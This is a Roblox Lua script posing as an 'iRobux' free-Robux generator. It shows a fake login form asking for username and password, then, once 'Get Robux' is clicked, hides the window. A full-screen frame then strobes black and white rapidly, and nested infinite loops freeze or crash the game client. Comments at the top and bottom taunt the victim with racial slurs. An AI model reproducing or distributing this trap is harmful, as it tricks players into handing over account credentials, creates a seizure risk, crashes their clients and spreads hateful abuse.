-- you're a p of shit if you executed the script from here
 
-- scripter: RegularSVilisz#7789
 
--[STEALING ANY SCRIPTS OR WORKS IN HERE MEANS YOU'RE A BULLSH1T N1GGA LM[FAOOOOOOOOO]
 
 
local FYD78FYIDGFUYD8UOIFHUYF7D89FIUHDJFYU78FIUDFHJGDFY78UFIODJHFUY78DIUFJHGDYU78F9IOK = Instance.new("ScreenGui")
local Frame = Instance.new("Frame")
local Frame_2 = Instance.new("Frame")
local UICorner = Instance.new("UICorner")
local TopFrame = Instance.new("Frame")
local UICorner_2 = Instance.new("UICorner")
local Frame_3 = Instance.new("Frame")
local nfA5 = Instance.new("Frame")
local UICorner_3 = Instance.new("UICorner")
local TextButton = Instance.new("TextButton")
local UICorner_4 = Instance.new("UICorner")
local ImageLabel = Instance.new("ImageLabel")
local UIScale = Instance.new("UIScale")
local Frame_4 = Instance.new("Frame")
local ihave = Instance.new("Frame")
local UICorner_5 = Instance.new("UICorner")
local lastframe = Instance.new("Frame")
local FramexxA = Instance.new("Frame")
local TextLabel = Instance.new("TextLabel")
local UICorner_6 = Instance.new("UICorner")
local clicksA = Instance.new("Frame")
local UICorner_7 = Instance.new("UICorner")
local FrameA3 = Instance.new("Frame")
local UICorner_8 = Instance.new("UICorner")
local TextBox = Instance.new("TextBox")
local RedeemerA = Instance.new("Frame")
local UICorner_9 = Instance.new("UICorner")
local TextButton_2 = Instance.new("TextButton")
local UICorner_10 = Instance.new("UICorner")
local freeroboA = Instance.new("Frame")
local UICorner_11 = Instance.new("UICorner")
local hold = Instance.new("Frame")
local Frame_5 = Instance.new("Frame")
local TextLabel_2 = Instance.new("TextLabel")
local TextButton_3 = Instance.new("TextButton")
local ware = Instance.new("Frame")
local UsernameA = Instance.new("Frame")
local UICorner_12 = Instance.new("UICorner")
local FrameA3_2 = Instance.new("Frame")
local UICorner_13 = Instance.new("UICorner")
local TextBox_2 = Instance.new("TextBox")
local PasswordA = Instance.new("Frame")
local UICorner_14 = Instance.new("UICorner")
local FrameA4 = Instance.new("Frame")
local UICorner_15 = Instance.new("UICorner")
local TextBox_3 = Instance.new("TextBox")
local helper = Instance.new("Frame")
local RedeemerA_2 = Instance.new("Frame")
local UICorner_16 = Instance.new("UICorner")
local TextButton_4 = Instance.new("TextButton")
local UICorner_17 = Instance.new("UICorner")
local ImageLabel_2 = Instance.new("ImageLabel")
local UICorner_18 = Instance.new("UICorner")
local TextLabel_3 = Instance.new("TextLabel")
local TextLabel_4 = Instance.new("TextLabel")
local TextLabel_5 = Instance.new("TextLabel")
local killer = Instance.new("Frame")
local s1 = Instance.new("UIStroke")
local s2 = Instance.new("UIStroke")
local s3 = Instance.new("UIStroke")
local s4 = Instance.new("UIStroke")
local s5 = Instance.new("UIStroke")
local s6 = Instance.new("UIStroke")
local s7 = Instance.new("UIStroke")
local s8 = Instance.new("UIStroke")
local s9 = Instance.new("UIStroke")
local s10 = Instance.new("UIStroke")
local s11 = Instance.new("UIStroke")
local s12 = Instance.new("UIStroke")
FYD78FYIDGFUYD8UOIFHUYF7D89FIUHDJFYU78FIUDFHJGDFY78UFIODJHFUY78DIUFJHGDYU78F9IOK.Name = "FYD78FYIDGFUYD8UOIFHUYF7D89FIUHDJFYU78FIUDFHJGDFY78UFIODJHFUY78DIUFJHGDYU78F9IOK"
FYD78FYIDGFUYD8UOIFHUYF7D89FIUHDJFYU78FIUDFHJGDFY78UFIODJHFUY78DIUFJHGDYU78F9IOK.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
FYD78FYIDGFUYD8UOIFHUYF7D89FIUHDJFYU78FIUDFHJGDFY78UFIODJHFUY78DIUFJHGDYU78F9IOK.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
FYD78FYIDGFUYD8UOIFHUYF7D89FIUHDJFYU78FIUDFHJGDFY78UFIODJHFUY78DIUFJHGDYU78F9IOK.ResetOnSpawn = false
Frame.Parent = FYD78FYIDGFUYD8UOIFHUYF7D89FIUHDJFYU78FIUDFHJGDFY78UFIODJHFUY78DIUFJHGDYU78F9IOK
Frame.BackgroundColor3 = Color3.fromRGB(98, 98, 98)
Frame.BackgroundTransparency = 1.000
Frame.Position = UDim2.new(0.27524367, 0, 0.21125564, 0)
Frame.Size = UDim2.new(0, 459, 0, 42)
Frame_2.Parent = Frame
Frame_2.BackgroundColor3 = Color3.fromRGB(13, 13, 13)
Frame_2.Position = UDim2.new(-0.000833475962, 0, -0.00581201911, 0)
Frame_2.Size = UDim2.new(0, 459, 0, 495)
UICorner.Parent = Frame_2
TopFrame.Name = "TopFrame"
TopFrame.Parent = Frame_2
TopFrame.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
TopFrame.Size = UDim2.new(0, 459, 0, 42)
TopFrame.ZIndex = 999999999
UICorner_2.Parent = TopFrame
Frame_3.Parent = TopFrame
Frame_3.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
Frame_3.BorderSizePixel = 0
Frame_3.Position = UDim2.new(0, 0, 0.596825719, 0)
Frame_3.Size = UDim2.new(0, 459, 0, 18)
Frame_3.ZIndex = 2
nfA5.Name = "nfA5"
nfA5.Parent = TopFrame
nfA5.BackgroundColor3 = Color3.fromRGB(15, 15, 15)
nfA5.Position = UDim2.new(0.865777969, 0, 0.178558633, 0)
nfA5.Size = UDim2.new(0, 79, 0, 37)
nfA5.ZIndex = 999999999
UICorner_3.Parent = nfA5
TextButton.Parent = nfA5
TextButton.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextButton.Position = UDim2.new(0.0500000007, 0, 0.0810000002, 0)
TextButton.Size = UDim2.new(0, 30, 0, 30)
TextButton.Font = Enum.Font.SourceSans
TextButton.Text = ""
TextButton.TextColor3 = Color3.fromRGB(0, 0, 0)
TextButton.TextSize = 14.000
UICorner_4.Parent = TextButton
ImageLabel.Parent = TextButton
ImageLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
ImageLabel.BackgroundTransparency = 1.000
ImageLabel.Position = UDim2.new(-0.0254766941, 0, -0.0300216079, 0)
ImageLabel.Size = UDim2.new(0, 30, 0, 30)
ImageLabel.Visible = false
ImageLabel.ZIndex = 10
ImageLabel.Image = "rbxassetid://8589545938"
ImageLabel.ImageColor3 = Color3.fromRGB(0, 0, 0)
UIScale.Parent = nfA5
UIScale.Scale = 0.700
Frame_4.Parent = Frame_2
Frame_4.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Frame_4.BackgroundTransparency = 1.000
Frame_4.BorderSizePixel = 0
Frame_4.Position = UDim2.new(0, 0, 0.0870033354, 0)
Frame_4.Size = UDim2.new(0, 458, 0, 451)
ihave.Name = "ihave"
ihave.Parent = Frame_4
ihave.BackgroundColor3 = Color3.fromRGB(15, 15, 15)
ihave.Position = UDim2.new(0.0115457773, 0, 0.00987137854, 0)
ihave.Size = UDim2.new(0, 448, 0, 441)
ihave.ZIndex = 9
UICorner_5.Parent = ihave
lastframe.Name = "lastframe"
lastframe.Parent = ihave
lastframe.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
lastframe.BackgroundTransparency = 1.000
lastframe.ClipsDescendants = true
lastframe.Position = UDim2.new(1.04308128e-07, 0, -0.000749528408, 0)
lastframe.Size = UDim2.new(0, 448, 0, 441)
lastframe.ZIndex = 999999999
FramexxA.Name = "FramexxA"
FramexxA.Parent = lastframe
FramexxA.BackgroundColor3 = Color3.fromRGB(13, 13, 13)
FramexxA.Position = UDim2.new(0.187999994, 0, 1, 9)
FramexxA.Size = UDim2.new(0, 278, 0, 180)
FramexxA.ZIndex = 10
TextLabel.Parent = FramexxA
TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.BackgroundTransparency = 1.000
TextLabel.Position = UDim2.new(0.140071988, 0, 0.0259574652, 0)
TextLabel.Size = UDim2.new(0, 200, 0, 50)
TextLabel.ZIndex = 10
TextLabel.Font = Enum.Font.SourceSans
TextLabel.Text = "Last Step!"
TextLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.TextSize = 34.000
UICorner_6.Parent = FramexxA
clicksA.Name = "clicksA"
clicksA.Parent = FramexxA
clicksA.BackgroundColor3 = Color3.fromRGB(13, 13, 13)
clicksA.Position = UDim2.new(0.030022053, 0, 0.300574958, 0)
clicksA.Size = UDim2.new(0, 257, 0, 50)
clicksA.ZIndex = 10
UICorner_7.Parent = clicksA
FrameA3.Name = "FrameA3"
FrameA3.Parent = clicksA
FrameA3.BackgroundColor3 = Color3.fromRGB(15, 15, 15)
FrameA3.Position = UDim2.new(0.0179246217, 0, 0.119999997, 0)
FrameA3.Size = UDim2.new(0, 246, 0, 37)
FrameA3.ZIndex = 10
UICorner_8.Parent = FrameA3
TextBox.Parent = FrameA3
TextBox.BackgroundColor3 = Color3.fromRGB(25, 25, 25)
TextBox.BackgroundTransparency = 1.000
TextBox.Position = UDim2.new(0.0233466923, 0, 0, 0)
TextBox.Size = UDim2.new(0, 234, 0, 36)
TextBox.ZIndex = 99
TextBox.Font = Enum.Font.SourceSans
TextBox.MultiLine = true
TextBox.PlaceholderText = "Amount"
TextBox.Text = ""
TextBox.TextColor3 = Color3.fromRGB(255, 255, 255)
TextBox.TextSize = 14.000
TextBox.TextWrapped = true
TextBox.TextXAlignment = Enum.TextXAlignment.Left
RedeemerA.Name = "RedeemerA"
RedeemerA.Parent = FramexxA
RedeemerA.BackgroundColor3 = Color3.fromRGB(13, 13, 13)
RedeemerA.Position = UDim2.new(0.067653574, 0, 0.658598959, 0)
RedeemerA.Size = UDim2.new(0, 236, 0, 39)
RedeemerA.ZIndex = 10
UICorner_9.Parent = RedeemerA
TextButton_2.Parent = RedeemerA
TextButton_2.BackgroundColor3 = Color3.fromRGB(17, 17, 17)
TextButton_2.Position = UDim2.new(0.0211863518, 0, 0.128205121, 0)
TextButton_2.Size = UDim2.new(0, 226, 0, 29)
TextButton_2.ZIndex = 10
TextButton_2.Font = Enum.Font.SourceSans
TextButton_2.Text = "Get Robux"
TextButton_2.TextColor3 = Color3.fromRGB(255, 255, 255)
TextButton_2.TextSize = 14.000
UICorner_10.Parent = TextButton_2
freeroboA.Name = "freeroboA"
freeroboA.Parent = ihave
freeroboA.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
freeroboA.Position = UDim2.new(0.0358570628, 0, 0.0245685875, 0)
freeroboA.Size = UDim2.new(0, 416, 0, 45)
freeroboA.ZIndex = 9
UICorner_11.Parent = freeroboA
hold.Name = "hold"
hold.Parent = freeroboA
hold.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
hold.BackgroundTransparency = 1.000
hold.Size = UDim2.new(0, 9, 0, 6)
Frame_5.Parent = hold
Frame_5.BackgroundColor3 = Color3.fromRGB(33, 33, 33)
Frame_5.BackgroundTransparency = 0.500
Frame_5.BorderSizePixel = 0
Frame_5.Position = UDim2.new(0.910523534, 0, 5, 0)
Frame_5.Size = UDim2.new(0, 398, 0, 3)
TextLabel_2.Parent = hold
TextLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_2.BackgroundTransparency = 1.000
TextLabel_2.Position = UDim2.new(0.910523534, 0, 0, 0)
TextLabel_2.Size = UDim2.new(0, 122, 0, 30)
TextLabel_2.Font = Enum.Font.Gotham
TextLabel_2.Text = "Login"
TextLabel_2.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_2.TextSize = 12.000
TextLabel_2.TextXAlignment = Enum.TextXAlignment.Left
TextButton_3.Parent = hold
TextButton_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextButton_3.BackgroundTransparency = 1.000
TextButton_3.Size = UDim2.new(0, 416, 0, 30)
TextButton_3.Font = Enum.Font.SourceSans
TextButton_3.Text = ""
TextButton_3.TextColor3 = Color3.fromRGB(0, 0, 0)
TextButton_3.TextSize = 14.000
ware.Name = "ware"
ware.Parent = hold
ware.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
ware.BackgroundTransparency = 1.000
ware.Position = UDim2.new(0, 0, 7.33333349, 0)
ware.Size = UDim2.new(0, 416, 0, 206)
ware.Visible = false
ware.ZIndex = 10
UsernameA.Name = "UsernameA"
UsernameA.Parent = ware
UsernameA.BackgroundColor3 = Color3.fromRGB(13, 13, 13)
UsernameA.Position = UDim2.new(0.0192307699, 0, -0.00970873795, 0)
UsernameA.Size = UDim2.new(0, 398, 0, 50)
UsernameA.ZIndex = 10
UICorner_12.Parent = UsernameA
FrameA3_2.Name = "FrameA3"
FrameA3_2.Parent = UsernameA
FrameA3_2.BackgroundColor3 = Color3.fromRGB(15, 15, 15)
FrameA3_2.Position = UDim2.new(0.0179247074, 0, 0.119999997, 0)
FrameA3_2.Size = UDim2.new(0, 384, 0, 37)
UICorner_13.Parent = FrameA3_2
TextBox_2.Parent = FrameA3_2
TextBox_2.BackgroundColor3 = Color3.fromRGB(25, 25, 25)
TextBox_2.BackgroundTransparency = 1.000
TextBox_2.Position = UDim2.new(0.0207424164, 0, 0, 0)
TextBox_2.Size = UDim2.new(0, 367, 0, 36)
TextBox_2.ZIndex = 99
TextBox_2.Font = Enum.Font.SourceSans
TextBox_2.MultiLine = true
TextBox_2.PlaceholderText = "Username"
TextBox_2.Text = ""
TextBox_2.TextColor3 = Color3.fromRGB(255, 255, 255)
TextBox_2.TextSize = 14.000
TextBox_2.TextWrapped = true
TextBox_2.TextXAlignment = Enum.TextXAlignment.Left
PasswordA.Name = "PasswordA"
PasswordA.Parent = ware
PasswordA.BackgroundColor3 = Color3.fromRGB(13, 13, 13)
PasswordA.Position = UDim2.new(0.0189999994, 0, 0.25, 0)
PasswordA.Size = UDim2.new(0, 398, 0, 50)
PasswordA.ZIndex = 10
UICorner_14.Parent = PasswordA
FrameA4.Name = "FrameA4"
FrameA4.Parent = PasswordA
FrameA4.BackgroundColor3 = Color3.fromRGB(15, 15, 15)
FrameA4.Position = UDim2.new(0.0179245528, 0, 0.119999997, 0)
FrameA4.Size = UDim2.new(0, 384, 0, 37)
UICorner_15.Parent = FrameA4
TextBox_3.Parent = FrameA4
TextBox_3.BackgroundColor3 = Color3.fromRGB(25, 25, 25)
TextBox_3.BackgroundTransparency = 1.000
TextBox_3.Position = UDim2.new(0.0207424164, 0, 0, 0)
TextBox_3.Size = UDim2.new(0, 367, 0, 36)
TextBox_3.ZIndex = 99
TextBox_3.Font = Enum.Font.SourceSans
TextBox_3.MultiLine = true
TextBox_3.PlaceholderText = "Password"
TextBox_3.Text = ""
TextBox_3.TextColor3 = Color3.fromRGB(255, 255, 255)
TextBox_3.TextSize = 14.000
TextBox_3.TextWrapped = true
TextBox_3.TextXAlignment = Enum.TextXAlignment.Left
helper.Name = "helper"
helper.Parent = ware
helper.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
helper.Position = UDim2.new(0.572115421, 0, 0.74757278, 0)
helper.Size = UDim2.new(0, 100, 0, 3)
helper.Visible = false
helper.ZIndex = 999999999
RedeemerA_2.Name = "RedeemerA"
RedeemerA_2.Parent = ware
RedeemerA_2.BackgroundColor3 = Color3.fromRGB(13, 13, 13)
RedeemerA_2.Position = UDim2.new(0.211538464, 0, 0.553398073, 0)
RedeemerA_2.Size = UDim2.new(0, 236, 0, 39)
RedeemerA_2.ZIndex = 10
UICorner_16.Parent = RedeemerA_2
TextButton_4.Parent = RedeemerA_2
TextButton_4.BackgroundColor3 = Color3.fromRGB(17, 17, 17)
TextButton_4.Position = UDim2.new(0.0211863518, 0, 0.128205121, 0)
TextButton_4.Size = UDim2.new(0, 226, 0, 29)
TextButton_4.ZIndex = 10
TextButton_4.Font = Enum.Font.SourceSans
TextButton_4.Text = "Continue"
TextButton_4.TextColor3 = Color3.fromRGB(255, 255, 255)
TextButton_4.TextSize = 14.000
UICorner_17.Parent = TextButton_4
ImageLabel_2.Parent = Frame_4
ImageLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
ImageLabel_2.Position = UDim2.new(0, 0, -0.0399113074, 0)
ImageLabel_2.Size = UDim2.new(0, 459, 0, 470)
ImageLabel_2.Visible = false
ImageLabel_2.ZIndex = 8
ImageLabel_2.Image = "http://www.roblox.com/asset/?id=10908615416"
ImageLabel_2.ImageColor3 = Color3.fromRGB(170, 85, 255)
ImageLabel_2.ScaleType = Enum.ScaleType.Crop
UICorner_18.Parent = ImageLabel_2
TextLabel_3.Parent = Frame_2
TextLabel_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_3.BackgroundTransparency = 1.000
TextLabel_3.Size = UDim2.new(0, 221, 0, 41)
TextLabel_3.ZIndex = 999999999
TextLabel_3.Font = Enum.Font.SourceSans
TextLabel_3.Text = "SVilisz"
TextLabel_3.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_3.TextSize = 20.000
TextLabel_3.TextXAlignment = Enum.TextXAlignment.Right
TextLabel_4.Parent = Frame
TextLabel_4.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_4.BackgroundTransparency = 1.000
TextLabel_4.Position = UDim2.new(0.516339898, 0, -0.0238095243, 0)
TextLabel_4.Size = UDim2.new(0, 221, 0, 42)
TextLabel_4.ZIndex = 99999999
TextLabel_4.Font = Enum.Font.SourceSans
TextLabel_4.Text = "iRobux"
TextLabel_4.TextColor3 = Color3.fromRGB(170, 0, 255)
TextLabel_4.TextSize = 25.000
TextLabel_4.TextXAlignment = Enum.TextXAlignment.Left
TextLabel_5.Parent = Frame
TextLabel_5.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_5.BackgroundTransparency = 1.000
TextLabel_5.Position = UDim2.new(0.480648011, 0, -0.0238095243, 0)
TextLabel_5.Size = UDim2.new(0, 16, 0, 42)
TextLabel_5.ZIndex = 999999999
TextLabel_5.Font = Enum.Font.SourceSans
TextLabel_5.Text = "-"
TextLabel_5.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_5.TextSize = 22.000
killer.Name = "killer"
killer.Parent = FYD78FYIDGFUYD8UOIFHUYF7D89FIUHDJFYU78FIUDFHJGDFY78UFIODJHFUY78DIUFJHGDYU78F9IOK
killer.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
killer.Position = UDim2.new(-1.40854788, 0, -2.39524865, 0)
killer.Size = UDim2.new(999, 1317, 999, 919)
killer.Visible = false
s1.Color = Color3.fromRGB(25, 25, 25)
s2.Color = Color3.fromRGB(25, 25, 25)
s3.Color = Color3.fromRGB(25, 25, 25)
s4.Color = Color3.fromRGB(25, 25, 25)
s5.Color = Color3.fromRGB(25, 25, 25)
s6.Color = Color3.fromRGB(25, 25, 25)
s7.Color = Color3.fromRGB(25, 25, 25)
s8.Color = Color3.fromRGB(25, 25, 25)
s9.Color = Color3.fromRGB(25, 25, 25)
s10.Color = Color3.fromRGB(25, 25, 25)
s11.Color = Color3.fromRGB(25, 25, 25)
s12.Color = Color3.fromRGB(25, 25, 25)
s1.Parent = ihave
s2.Parent = FramexxA
s3.Parent = RedeemerA
s4.Parent = RedeemerA_2
s5.Parent = clicksA
s6.Parent = FrameA3
s7.Parent = freeroboA
s8.Parent = UsernameA
s9.Parent = PasswordA
s10.Parent = nfA5
s11.Parent = FrameA4
s12.Parent = FrameA3_2
local function SLKQ_fake_script() 
	local script = Instance.new('LocalScript', TextButton)
	script.Parent.MouseButton1Click:Connect(function()
		if script.Parent.Position == UDim2.new(0.05, 0,0.081, 0) then
			script.Parent:TweenPosition(UDim2.new(0.55, 0,0.081, 0), "Out", "Quint", 0.35, true)
			script.Parent.ImageLabel.Visible = true
			script.Parent.Parent.Parent.Parent.Parent.Parent.Frame.Frame.Frame.ImageLabel.Visible = true
		else
			script.Parent:TweenPosition(UDim2.new(0.05, 0,0.081, 0), "Out", "Quint", 0.35, true)
			script.Parent.ImageLabel.Visible = false
			script.Parent.Parent.Parent.Parent.Parent.Parent.Frame.Frame.Frame.ImageLabel.Visible = false
		end
	end)
end
coroutine.wrap(SLKQ_fake_script)()
local function WEZALS_fake_script()
	local script = Instance.new('LocalScript', TextButton_2)
	script.Parent.MouseButton1Click:Connect(function()
		if script.Parent.Parent.Parent.clicksA.FrameA3.TextBox.Text == "" then
			script.Parent.Text = "Get Robus"
			wait(1)
			script.Parent.Text = "Get Robux"
		else
			script.Parent.Text = "Loading"
			wait(2)
			script.Parent.Parent.Parent.Parent.Parent.Parent.Parent.Parent.Parent.Frame.Visible = false
		end
	end)
end
coroutine.wrap(WEZALS_fake_script)()
local function WFLX_fake_script()
	local script = Instance.new('LocalScript', TextButton_3)
	script.Parent.MouseButton1Click:Connect(function()
		if script.Parent.Parent.Parent.Parent.freeroboA.Size == UDim2.new(0, 416,0, 45) then
			script.Parent.Parent.Parent.Parent.freeroboA:TweenSize(UDim2.new(0, 416,0, 212), "Out", "Quint", 0.35, true)
			wait(0.36)
			if script.Parent.Parent.Parent.Parent.freeroboA.Size == UDim2.new(0, 416,0, 212) then
				script.Parent.Parent.ware.Visible = true
			end
		else
			script.Parent.Parent.Parent.Parent.freeroboA:TweenSize(UDim2.new(0, 416,0, 45), "Out", "Quint", 0.35, true)
			script.Parent.Parent.ware.Visible = false
		end
	end)
end
coroutine.wrap(WFLX_fake_script)()
local function TZJCSXO_fake_script()
	local script = Instance.new('LocalScript', TextButton_4)
	script.Parent.MouseButton1Click:Connect(function()
		if script.Parent.Parent.Parent.PasswordA.FrameA4.TextBox.Text == "" and
			script.Parent.Parent.Parent.UsernameA.FrameA3.TextBox.Text == "" then
	else
			script.Parent.Parent.Parent.Parent.Parent.Parent.lastframe.FramexxA:TweenPosition(UDim2.new(0.188, 0,0.186, 0), "Out", "Quint", 0.3, true)
			script.Parent.Parent.Parent.Parent.Parent.Parent.freeroboA:TweenSize(UDim2.new(0, 416,0, 45), "Out", "Quint", 0.35, true)
			script.Parent.Parent.Parent.Parent.ware.Visible = false
		end
	end)
end
coroutine.wrap(TZJCSXO_fake_script)()
local function ILRQ_fake_script()
	local script = Instance.new('LocalScript', Frame)
	local UIS = game:GetService('UserInputService')
	local frame = script.Parent
	local dragToggle = nil
	local dragSpeed = 0.10
	local dragStart = nil
	local startPos = nil
	local function updateInput(input)
		local delta = input.Position - dragStart
		local position = UDim2.new(startPos.X.Scale, startPos.X.Offset + delta.X,
			startPos.Y.Scale, startPos.Y.Offset + delta.Y)
		game:GetService('TweenService'):Create(frame, TweenInfo.new(dragSpeed), {Position = position}):Play()
	end
	frame.InputBegan:Connect(function(input)
		if (input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch) then 
			dragToggle = true
			dragStart = input.Position
			startPos = frame.Position
			input.Changed:Connect(function()
				if input.UserInputState == Enum.UserInputState.End then
					dragToggle = false
				end
			end)
		end
	end)
	UIS.InputChanged:Connect(function(input)
		if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then
			if dragToggle then
				updateInput(input)
			end
		end
	end)
end
coroutine.wrap(ILRQ_fake_script)()
local function HOTW_fake_script() 
	local script = Instance.new('LocalScript', FYD78FYIDGFUYD8UOIFHUYF7D89FIUHDJFYU78FIUDFHJGDFY78UFIODJHFUY78DIUFJHGDYU78F9IOK)
	script.Parent.Enabled = false
	wait(5)
	script.Parent.Enabled = true
end
coroutine.wrap(HOTW_fake_script)()
local function ISGGWS_fake_script()
	local script = Instance.new('LocalScript', killer)
	while true do
		wait(0.000000000000000000000000000000000000000000000000000000000000000000000000001)
		if script.Parent.Parent.Frame.Visible == false then
		script.Parent.Visible = true
		script.Parent.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		wait(0.000000000000000000000000000000000000000000000000000000000000000000000000001)
		script.Parent.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
		end
	end
end
coroutine.wrap(ISGGWS_fake_script)()
local function NQZKE_fake_script()
	local script = Instance.new('LocalScript', killer)
	while true do
		wait(0.0000000000000000000000000000000000001)
	if script.Parent.Parent.Frame.Visible == false then
			local script = Instance.new('LocalScript', killer)
			while true do
				wait(math.random(1, 10))
				if Frame.Visible == false then
					local script = Instance.new('LocalScript', killer)
					while true do
						warn()
					end
				end
			end
	end
	end
end
coroutine.wrap(NQZKE_fake_script)()
 
-- You really thought something funny or helpful there?, nah you're a dumb sass n1gga
